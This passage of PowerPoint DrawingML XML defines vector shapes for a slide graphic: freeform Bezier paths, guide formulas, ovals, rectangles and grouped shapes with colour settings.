                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="52"/>
                          <a:pt x="99" y="52"/>
                          <a:pt x="99" y="52"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="20"/>
                          <a:pt x="99" y="4"/>
                          <a:pt x="99" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="98" y="8"/>
                          <a:pt x="95" y="13"/>
                          <a:pt x="89" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="80" y="16"/>
                          <a:pt x="0" y="0"/>
                          <a:pt x="2" y="8"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="9"/>
                          <a:pt x="2" y="9"/>
                          <a:pt x="2" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="31"/>
                          <a:pt x="2" y="31"/>
                          <a:pt x="2" y="31"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="55"/>
                          <a:pt x="0" y="64"/>
                          <a:pt x="12" y="67"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="69"/>
                          <a:pt x="66" y="82"/>
                          <a:pt x="70" y="83"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="83"/>
                          <a:pt x="78" y="84"/>
                          <a:pt x="83" y="82"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="97" y="78"/>
                          <a:pt x="127" y="71"/>
                          <a:pt x="149" y="65"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="150" y="137"/>
                          <a:pt x="150" y="137"/>
                          <a:pt x="150" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="150" y="138"/>
                          <a:pt x="150" y="140"/>
                          <a:pt x="150" y="141"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="151" y="167"/>
                          <a:pt x="196" y="163"/>
                          <a:pt x="197" y="140"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="125"/>
                          <a:pt x="196" y="60"/>
                          <a:pt x="196" y="44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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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07" name="Freeform 1864">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63525410-AB71-43B1-B658-9FD7EC1E4A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363" y="1229"/>
                    <a:ext cx="343" cy="269"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 209 w 254"/>
                      <a:gd name="T1" fmla="*/ 119 h 200"/>
                      <a:gd name="T2" fmla="*/ 184 w 254"/>
                      <a:gd name="T3" fmla="*/ 127 h 200"/>
                      <a:gd name="T4" fmla="*/ 173 w 254"/>
                      <a:gd name="T5" fmla="*/ 55 h 200"/>
                      <a:gd name="T6" fmla="*/ 144 w 254"/>
                      <a:gd name="T7" fmla="*/ 27 h 200"/>
                      <a:gd name="T8" fmla="*/ 96 w 254"/>
                      <a:gd name="T9" fmla="*/ 14 h 200"/>
                      <a:gd name="T10" fmla="*/ 51 w 254"/>
                      <a:gd name="T11" fmla="*/ 2 h 200"/>
                      <a:gd name="T12" fmla="*/ 18 w 254"/>
                      <a:gd name="T13" fmla="*/ 13 h 200"/>
                      <a:gd name="T14" fmla="*/ 3 w 254"/>
                      <a:gd name="T15" fmla="*/ 96 h 200"/>
                      <a:gd name="T16" fmla="*/ 3 w 254"/>
                      <a:gd name="T17" fmla="*/ 96 h 200"/>
                      <a:gd name="T18" fmla="*/ 2 w 254"/>
                      <a:gd name="T19" fmla="*/ 99 h 200"/>
                      <a:gd name="T20" fmla="*/ 2 w 254"/>
                      <a:gd name="T21" fmla="*/ 99 h 200"/>
                      <a:gd name="T22" fmla="*/ 9 w 254"/>
                      <a:gd name="T23" fmla="*/ 118 h 200"/>
                      <a:gd name="T24" fmla="*/ 26 w 254"/>
                      <a:gd name="T25" fmla="*/ 119 h 200"/>
                      <a:gd name="T26" fmla="*/ 33 w 254"/>
                      <a:gd name="T27" fmla="*/ 117 h 200"/>
                      <a:gd name="T28" fmla="*/ 33 w 254"/>
                      <a:gd name="T29" fmla="*/ 117 h 200"/>
                      <a:gd name="T30" fmla="*/ 36 w 254"/>
                      <a:gd name="T31" fmla="*/ 116 h 200"/>
                      <a:gd name="T32" fmla="*/ 43 w 254"/>
                      <a:gd name="T33" fmla="*/ 114 h 200"/>
                      <a:gd name="T34" fmla="*/ 44 w 254"/>
                      <a:gd name="T35" fmla="*/ 76 h 200"/>
                      <a:gd name="T36" fmla="*/ 41 w 254"/>
                      <a:gd name="T37" fmla="*/ 77 h 200"/>
                      <a:gd name="T38" fmla="*/ 44 w 254"/>
                      <a:gd name="T39" fmla="*/ 53 h 200"/>
                      <a:gd name="T40" fmla="*/ 43 w 254"/>
                      <a:gd name="T41" fmla="*/ 171 h 200"/>
                      <a:gd name="T42" fmla="*/ 53 w 254"/>
                      <a:gd name="T43" fmla="*/ 183 h 200"/>
                      <a:gd name="T44" fmla="*/ 111 w 254"/>
                      <a:gd name="T45" fmla="*/ 199 h 200"/>
                      <a:gd name="T46" fmla="*/ 140 w 254"/>
                      <a:gd name="T47" fmla="*/ 177 h 200"/>
                      <a:gd name="T48" fmla="*/ 140 w 254"/>
                      <a:gd name="T49" fmla="*/ 171 h 200"/>
                      <a:gd name="T50" fmla="*/ 140 w 254"/>
                      <a:gd name="T51" fmla="*/ 139 h 200"/>
                      <a:gd name="T52" fmla="*/ 139 w 254"/>
                      <a:gd name="T53" fmla="*/ 98 h 200"/>
                      <a:gd name="T54" fmla="*/ 137 w 254"/>
                      <a:gd name="T55" fmla="*/ 84 h 200"/>
                      <a:gd name="T56" fmla="*/ 136 w 254"/>
                      <a:gd name="T57" fmla="*/ 79 h 200"/>
                      <a:gd name="T58" fmla="*/ 137 w 254"/>
                      <a:gd name="T59" fmla="*/ 84 h 200"/>
                      <a:gd name="T60" fmla="*/ 139 w 254"/>
                      <a:gd name="T61" fmla="*/ 98 h 200"/>
                      <a:gd name="T62" fmla="*/ 145 w 254"/>
                      <a:gd name="T63" fmla="*/ 136 h 200"/>
                      <a:gd name="T64" fmla="*/ 145 w 254"/>
                      <a:gd name="T65" fmla="*/ 137 h 200"/>
                      <a:gd name="T66" fmla="*/ 145 w 254"/>
                      <a:gd name="T67" fmla="*/ 137 h 200"/>
                      <a:gd name="T68" fmla="*/ 145 w 254"/>
                      <a:gd name="T69" fmla="*/ 142 h 200"/>
                      <a:gd name="T70" fmla="*/ 155 w 254"/>
                      <a:gd name="T71" fmla="*/ 165 h 200"/>
                      <a:gd name="T72" fmla="*/ 170 w 254"/>
                      <a:gd name="T73" fmla="*/ 171 h 200"/>
                      <a:gd name="T74" fmla="*/ 223 w 254"/>
                      <a:gd name="T75" fmla="*/ 155 h 200"/>
                      <a:gd name="T76" fmla="*/ 209 w 254"/>
                      <a:gd name="T77" fmla="*/ 119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254" h="200">
                        <a:moveTo>
                          <a:pt x="209" y="119"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="207" y="121"/>
                          <a:pt x="197" y="123"/>
                          <a:pt x="184" y="127"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="179" y="94"/>
                          <a:pt x="175" y="64"/>
                          <a:pt x="173" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="170" y="36"/>
                          <a:pt x="153" y="30"/>
                          <a:pt x="144" y="27"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="23"/>
                          <a:pt x="110" y="18"/>
                          <a:pt x="96" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="83" y="10"/>
                          <a:pt x="61" y="4"/>
                          <a:pt x="51" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="41" y="0"/>
                          <a:pt x="21" y="4"/>
                          <a:pt x="18" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="16" y="16"/>
                          <a:pt x="10" y="56"/>
                          <a:pt x="3" y="96"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="96"/>
                          <a:pt x="3" y="96"/>
                          <a:pt x="3" y="96"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="109"/>
                          <a:pt x="4" y="116"/>
                          <a:pt x="9" y="118"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="121"/>
                          <a:pt x="20" y="120"/>
                          <a:pt x="26" y="119"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="34" y="117"/>
                          <a:pt x="35" y="117"/>
                          <a:pt x="36" y="116"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="38" y="116"/>
                          <a:pt x="41" y="115"/>
                          <a:pt x="43" y="114"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="76"/>
                          <a:pt x="44" y="76"/>
                          <a:pt x="44" y="76"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="76"/>
                          <a:pt x="42" y="77"/>
                          <a:pt x="41" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="60"/>
                          <a:pt x="44" y="49"/>
                          <a:pt x="44" y="53"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="59"/>
                          <a:pt x="43" y="123"/>
                          <a:pt x="43" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="177"/>
                          <a:pt x="47" y="182"/>
                          <a:pt x="53" y="183"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="67" y="186"/>
                          <a:pt x="102" y="197"/>
                          <a:pt x="111" y="199"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="120" y="200"/>
                          <a:pt x="138" y="190"/>
                          <a:pt x="140" y="177"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="175"/>
                          <a:pt x="140" y="173"/>
                          <a:pt x="140" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="139"/>
                          <a:pt x="140" y="139"/>
                          <a:pt x="140" y="139"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="124"/>
                          <a:pt x="140" y="111"/>
                          <a:pt x="139" y="98"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="92"/>
                          <a:pt x="137" y="87"/>
                          <a:pt x="137" y="84"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="82"/>
                          <a:pt x="136" y="80"/>
                          <a:pt x="136" y="79"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="80"/>
                          <a:pt x="136" y="82"/>
                          <a:pt x="137" y="84"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="88"/>
                          <a:pt x="138" y="93"/>
                          <a:pt x="139" y="98"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="108"/>
                          <a:pt x="142" y="120"/>
                          <a:pt x="145" y="136"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="136"/>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="142"/>
                          <a:pt x="145" y="142"/>
                          <a:pt x="145" y="142"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="148" y="154"/>
                          <a:pt x="151" y="161"/>
                          <a:pt x="155" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="169"/>
                          <a:pt x="164" y="170"/>
                          <a:pt x="170" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="186" y="167"/>
                          <a:pt x="204" y="161"/>
                          <a:pt x="223" y="155"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="254" y="147"/>
                          <a:pt x="236" y="110"/>
                          <a:pt x="209" y="119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DDDDDD">
                          <a:gamma/>
                          <a:tint val="58431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08" name="Freeform 1865">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3E8F5DE-B15F-47C5-80DF-1EC0F5EB3D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440" y="1214"/>
                    <a:ext cx="89" cy="56"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 30 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 10 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 16 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 54 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 30 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="30" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="10" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="21"/>
                          <a:pt x="13" y="16"/>
                          <a:pt x="16" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="10"/>
                          <a:pt x="54" y="0"/>
                          <a:pt x="54" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="21"/>
                          <a:pt x="47" y="25"/>
                          <a:pt x="57" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="30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09" name="Oval 1866">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60342A02-3DBF-4CC1-A013-F190109FC0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gray">
                  <a:xfrm flipH="1">
                    <a:off x="2429" y="1132"/>
                    <a:ext cx="119" cy="119"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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992" name="Group 1867">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BD05061-26EF-4958-AABF-A3F62216B2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57" y="1924"/>
                <a:ext cx="318" cy="318"/>
                <a:chOff x="1613" y="2865"/>
                <a:chExt cx="318" cy="318"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1993" name="Rectangle 1868">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9011C8FB-4078-434D-8D25-D566EFF712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1891" y="3143"/>
                  <a:ext cx="40" cy="40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94" name="Rectangle 1869">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E3E7077-B21E-4E31-8388-E810DEAAE7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1810" y="3062"/>
                  <a:ext cx="71" cy="71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1995" name="Group 1870">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82691884-67E6-471A-9DAE-70411F2180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13" y="2865"/>
                  <a:ext cx="187" cy="187"/>
                  <a:chOff x="1209" y="2983"/>
                  <a:chExt cx="109" cy="109"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1996" name="Rectangle 1871">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DB85196-6B06-43ED-8B3D-6CBDE1CAAD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gray">
                  <a:xfrm>
                    <a:off x="1209" y="2983"/>
                    <a:ext cx="109" cy="109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1B171B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997" name="Group 1872">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1448F436-196F-4451-924B-27FB0A92ED0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224" y="3000"/>
                    <a:ext cx="79" cy="75"/>
                    <a:chOff x="1461" y="3602"/>
                    <a:chExt cx="187" cy="181"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="1998" name="Freeform 1873">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68A579D7-6460-4EB4-A8A5-7684EB67014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598" y="3602"/>
                      <a:ext cx="17" cy="168"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 23"/>
                        <a:gd name="T1" fmla="*/ 0 h 222"/>
                        <a:gd name="T2" fmla="*/ 0 w 23"/>
                        <a:gd name="T3" fmla="*/ 220 h 222"/>
                        <a:gd name="T4" fmla="*/ 23 w 23"/>
                        <a:gd name="T5" fmla="*/ 222 h 222"/>
                        <a:gd name="T6" fmla="*/ 23 w 23"/>
                        <a:gd name="T7" fmla="*/ 2 h 222"/>
                        <a:gd name="T8" fmla="*/ 0 w 23"/>
                        <a:gd name="T9" fmla="*/ 0 h 22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3" h="222">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="220"/>
                            <a:pt x="0" y="220"/>
                            <a:pt x="0" y="220"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="9" y="221"/>
                            <a:pt x="17" y="221"/>
                            <a:pt x="23" y="222"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="23" y="2"/>
                            <a:pt x="23" y="2"/>
                            <a:pt x="23" y="2"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="17" y="1"/>
                            <a:pt x="9" y="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1B171B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99" name="Freeform 1874">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74C32E13-6564-4AF9-B244-013B8FD276F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461" y="3602"/>
                      <a:ext cx="124" cy="181"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 105 w 163"/>
                        <a:gd name="T1" fmla="*/ 6 h 240"/>
                        <a:gd name="T2" fmla="*/ 0 w 163"/>
                        <a:gd name="T3" fmla="*/ 6 h 240"/>
                        <a:gd name="T4" fmla="*/ 0 w 163"/>
                        <a:gd name="T5" fmla="*/ 226 h 240"/>
                        <a:gd name="T6" fmla="*/ 106 w 163"/>
                        <a:gd name="T7" fmla="*/ 226 h 240"/>
                        <a:gd name="T8" fmla="*/ 163 w 163"/>
                        <a:gd name="T9" fmla="*/ 220 h 240"/>
                        <a:gd name="T10" fmla="*/ 163 w 163"/>
                        <a:gd name="T11" fmla="*/ 0 h 240"/>
                        <a:gd name="T12" fmla="*/ 105 w 163"/>
                        <a:gd name="T13" fmla="*/ 6 h 24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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="163" h="240">
                          <a:moveTo>
                            <a:pt x="105" y="6"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="51" y="20"/>
                            <a:pt x="0" y="6"/>
                            <a:pt x="0" y="6"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="226"/>
                            <a:pt x="0" y="226"/>
                            <a:pt x="0" y="226"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="226"/>
                            <a:pt x="51" y="240"/>
                            <a:pt x="106" y="226"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="126" y="221"/>
                            <a:pt x="146" y="220"/>
                            <a:pt x="163" y="220"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="163" y="0"/>
                            <a:pt x="163" y="0"/>
                            <a:pt x="163" y="0"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="146" y="0"/>
                            <a:pt x="126" y="1"/>
                            <a:pt x="105" y="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1B171B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000" name="Freeform 1875">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E294DD97-CE15-4751-A352-52E6F0F77BC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gray">
                    <a:xfrm>
                      <a:off x="1629" y="3602"/>
                      <a:ext cx="19" cy="171"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 24 w 24"/>
                        <a:gd name="T1" fmla="*/ 5 h 225"/>
                        <a:gd name="T2" fmla="*/ 0 w 24"/>
                        <a:gd name="T3" fmla="*/ 0 h 225"/>
                        <a:gd name="T4" fmla="*/ 0 w 24"/>
                        <a:gd name="T5" fmla="*/ 220 h 225"/>
                        <a:gd name="T6" fmla="*/ 24 w 24"/>
                        <a:gd name="T7" fmla="*/ 225 h 225"/>
                        <a:gd name="T8" fmla="*/ 24 w 24"/>
                        <a:gd name="T9" fmla="*/ 5 h 22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" h="225">
                          <a:moveTo>
                            <a:pt x="24" y="5"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="24" y="5"/>
                            <a:pt x="15" y="2"/>
                            <a:pt x="0" y="0"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="220"/>
                            <a:pt x="0" y="220"/>
                            <a:pt x="0" y="220"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="15" y="222"/>
                            <a:pt x="24" y="225"/>
                            <a:pt x="24" y="225"/>
                          </a:cubicBezTo>
                          <a:lnTo>
                            <a:pt x="24" y="5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1B171B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001" name="Freeform 1876">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{254C3206-420D-40D5-B557-431D3E791412}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr>
                      <a:spLocks noEditPoints="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm>
                      <a:off x="1476" y="3647"/>
                      <a:ext cx="84" cy="90"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 83 w 109"/>
                        <a:gd name="T1" fmla="*/ 23 h 119"/>
                        <a:gd name="T2" fmla="*/ 74 w 109"/>
                        <a:gd name="T3" fmla="*/ 78 h 119"/>
                        <a:gd name="T4" fmla="*/ 73 w 109"/>
                        <a:gd name="T5" fmla="*/ 80 h 119"/>
                        <a:gd name="T6" fmla="*/ 74 w 109"/>
                        <a:gd name="T7" fmla="*/ 82 h 119"/>
                        <a:gd name="T8" fmla="*/ 76 w 109"/>
                        <a:gd name="T9" fmla="*/ 83 h 119"/>
                        <a:gd name="T10" fmla="*/ 84 w 109"/>
                        <a:gd name="T11" fmla="*/ 80 h 119"/>
                        <a:gd name="T12" fmla="*/ 94 w 109"/>
                        <a:gd name="T13" fmla="*/ 68 h 119"/>
                        <a:gd name="T14" fmla="*/ 98 w 109"/>
                        <a:gd name="T15" fmla="*/ 49 h 119"/>
                        <a:gd name="T16" fmla="*/ 87 w 109"/>
                        <a:gd name="T17" fmla="*/ 20 h 119"/>
                        <a:gd name="T18" fmla="*/ 58 w 109"/>
                        <a:gd name="T19" fmla="*/ 10 h 119"/>
                        <a:gd name="T20" fmla="*/ 33 w 109"/>
                        <a:gd name="T21" fmla="*/ 16 h 119"/>
                        <a:gd name="T22" fmla="*/ 16 w 109"/>
                        <a:gd name="T23" fmla="*/ 34 h 119"/>
                        <a:gd name="T24" fmla="*/ 11 w 109"/>
                        <a:gd name="T25" fmla="*/ 60 h 119"/>
                        <a:gd name="T26" fmla="*/ 24 w 109"/>
                        <a:gd name="T27" fmla="*/ 96 h 119"/>
                        <a:gd name="T28" fmla="*/ 57 w 109"/>
                        <a:gd name="T29" fmla="*/ 109 h 119"/>
                        <a:gd name="T30" fmla="*/ 76 w 109"/>
                        <a:gd name="T31" fmla="*/ 105 h 119"/>
                        <a:gd name="T32" fmla="*/ 94 w 109"/>
                        <a:gd name="T33" fmla="*/ 96 h 119"/>
                        <a:gd name="T34" fmla="*/ 109 w 109"/>
                        <a:gd name="T35" fmla="*/ 96 h 119"/>
                        <a:gd name="T36" fmla="*/ 97 w 109"/>
                        <a:gd name="T37" fmla="*/ 106 h 119"/>
                        <a:gd name="T38" fmla="*/ 79 w 109"/>
                        <a:gd name="T39" fmla="*/ 115 h 119"/>
                        <a:gd name="T40" fmla="*/ 57 w 109"/>
                        <a:gd name="T41" fmla="*/ 119 h 119"/>
                        <a:gd name="T42" fmla="*/ 28 w 109"/>
                        <a:gd name="T43" fmla="*/ 111 h 119"/>
                        <a:gd name="T44" fmla="*/ 7 w 109"/>
                        <a:gd name="T45" fmla="*/ 90 h 119"/>
                        <a:gd name="T46" fmla="*/ 0 w 109"/>
                        <a:gd name="T47" fmla="*/ 60 h 119"/>
                        <a:gd name="T48" fmla="*/ 7 w 109"/>
                        <a:gd name="T49" fmla="*/ 29 h 119"/>
                        <a:gd name="T50" fmla="*/ 28 w 109"/>
                        <a:gd name="T51" fmla="*/ 7 h 119"/>
                        <a:gd name="T52" fmla="*/ 58 w 109"/>
                        <a:gd name="T53" fmla="*/ 0 h 119"/>
                        <a:gd name="T54" fmla="*/ 94 w 109"/>
                        <a:gd name="T55" fmla="*/ 13 h 119"/>
                        <a:gd name="T56" fmla="*/ 109 w 109"/>
                        <a:gd name="T57" fmla="*/ 49 h 119"/>
                        <a:gd name="T58" fmla="*/ 103 w 109"/>
                        <a:gd name="T59" fmla="*/ 73 h 119"/>
                        <a:gd name="T60" fmla="*/ 87 w 109"/>
                        <a:gd name="T61" fmla="*/ 90 h 119"/>
                        <a:gd name="T62" fmla="*/ 72 w 109"/>
                        <a:gd name="T63" fmla="*/ 95 h 119"/>
                        <a:gd name="T64" fmla="*/ 64 w 109"/>
                        <a:gd name="T65" fmla="*/ 93 h 119"/>
                        <a:gd name="T66" fmla="*/ 60 w 109"/>
                        <a:gd name="T67" fmla="*/ 87 h 119"/>
                        <a:gd name="T68" fmla="*/ 52 w 109"/>
                        <a:gd name="T69" fmla="*/ 93 h 119"/>
                        <a:gd name="T70" fmla="*/ 43 w 109"/>
                        <a:gd name="T71" fmla="*/ 95 h 119"/>
                        <a:gd name="T72" fmla="*/ 27 w 109"/>
